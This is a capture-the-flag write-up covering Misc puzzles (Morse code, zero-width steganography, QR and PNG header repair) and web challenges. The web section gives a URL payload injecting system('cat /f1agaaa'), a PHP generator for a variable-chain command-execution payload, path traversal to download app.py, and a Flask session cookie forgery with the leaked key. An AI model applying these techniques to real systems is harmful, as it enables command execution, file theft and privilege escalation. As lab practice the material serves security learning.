Miscellaneous

Who Am I?

This challenge requires matching items against a provided list. While straightforward, it demands careful attention to detail as the information is spread across multiple entries. The solution involves cross-referencing each elemant systematically until all correspondences are established.

You and Me

Blind watermarking extraction forms the core of this challenge. The BlindWatermark tool accepts two images as input: the original image without the watermark and the image containing the hidden watermark. When both images are processed through the tool, it reconstructs and outputs the embedded blind watermark, revealing the hidden information.

7.1.05

The provided .SAV file represents a game save file. The QQ number 754365305 in the hint serves as a search key, identifying the game as "Capitalism" (金融帝国). The challenge title "7.1.05" corresponds to a specific version number of this game.

The solution path requires downloading the matching game version and loading the save file. Once inside the game environment, following the in-game instructions progressively reveals pieces of the flag.

Black Stockings, White Stockings, and Other Stockings

The challenge title hints at Morse code. The encoded string provided decodes directly using Morse code translation:

.-- ....- -. - - ----- -... ...-- -- --- .-. . -.-. ..- - .

Standard Morse code interpretation yields the flag.

I Vomited, You Do As You Please

The filename provides a clue pointing to zero-width steganography. The technique embeds information within Unicode zero-width characters (zero-width non-joiner, zero-width joiner, and word joiner). Copying the seemingly empty text and analyzing it reveals the hidden content when examined with appropriate tools or converted to reveal the invisible characters.

Rapid Response

The QR code cannot be scanned directly. QRazyBox, an advanced QR code analysis tool, provides the necessary functionality for extraction.

Load the image into QRazyBox and navigate to the Tools menu, selecting "Extract QR Information." This operation reveals the first portion of the flag.

The remaining steps require a creative approach not immediately obvious without reference material. Use the drawing tool on the left side to fill the error correction area on the left side with white. After this modification, re-running the extraction reveals the complete flag.

Final flag: ctfshow{11451419-1981-landexiangle}

Unopenable Image

A valid PNG file begins with the hexadecimal signature 89 50 4E 47. Opening the provided image in a hex editor reveals that the first four bytes have been modified. Each byte contains a value that, when added to the expected correct value, totals 100 in decimal.

This indicates the use of one's complement (bitwise NOT) operation on the PNG header bytes. Applying the same operation again to these bytes restores them to their correct values, allowing the image to open and reveal the flag.

Web Challenges

Web Check-in

The challenge requires submitting a specific payload via URL parameters and additional headers. The complete request structure follows:

https://7547cfec-75c7-476c-8109-d1400777247b.challenge.ctf.show/?b=c&c[0]=1&c[6][0][7][5][8][0][9][4][4]=system("cat /f1agaaa");

POST data: a=b
Cookie: CTFshow-QQ群：=a

Note: Successful exploitation requires using Chrome's Hackbar extension. The Edge version produced inconsistent results during testing, suggesting browser-specific behavior in how the request is processed.

Only Dollar Signs in My Eyes

This challenge tests understanding of variable nesting in PHP. The solution involves constructing a query string where each parameter references another, creating a chain that ultimately executes system commands.

$count = strlen(input("Enter string: "));
$result = "_=a0";

for ($i = 0; $i < $count - 2; $i++) {
    $result .= '&a' . $i . '=' . 'a' . ($i + 1);
}

$result .= '&a' . ($count - 2) . '=system("ls /");';
echo "Output: $result\n";

Execute the generated payload through the POST method to enumerate files. Replace the directory listing command with cat /f* to read and obtain the flag.

Gacha Roll

Initial interaction reveals an image gallery interface, though the actual vulnerability lies elsewhere. Examining the page source exposes a suspicious endpoint: /download?file=.

Attempting to directly download flag fails. Specifying a non-existent image file like 1.png reveals that the application uses app.py for file handling. The error message exposes the path concatenasion logic used in the download function.

Traversing the directory structure by setting file=../../app.py allows downloading the application source code. Analysis of app.py reveals that accessing the flag requires executing the getflag() function with a session value of 'isadmin'. The secret key used for session signing is discoverable within the application.

Flask session cookie forgery enables creating a valid session with administrator privileges. The flask_session_cookie_manager3 script ganerates the forged cookie:

python3 flask_session_cookie_manager3.py encode -t "{'isadmin':true}" -s "tanji_is_A_boy_Yooooooooooooooooooooo!"

The resulting session token: eyJpc2FkbWluIjp0cnVlfQ.ZmufEg.vF6jyYAmenDHHQ6L9EyqeaYZqTM

Submitting this cookie and accessing /secret_path_U_you_never_know retrieves the flag.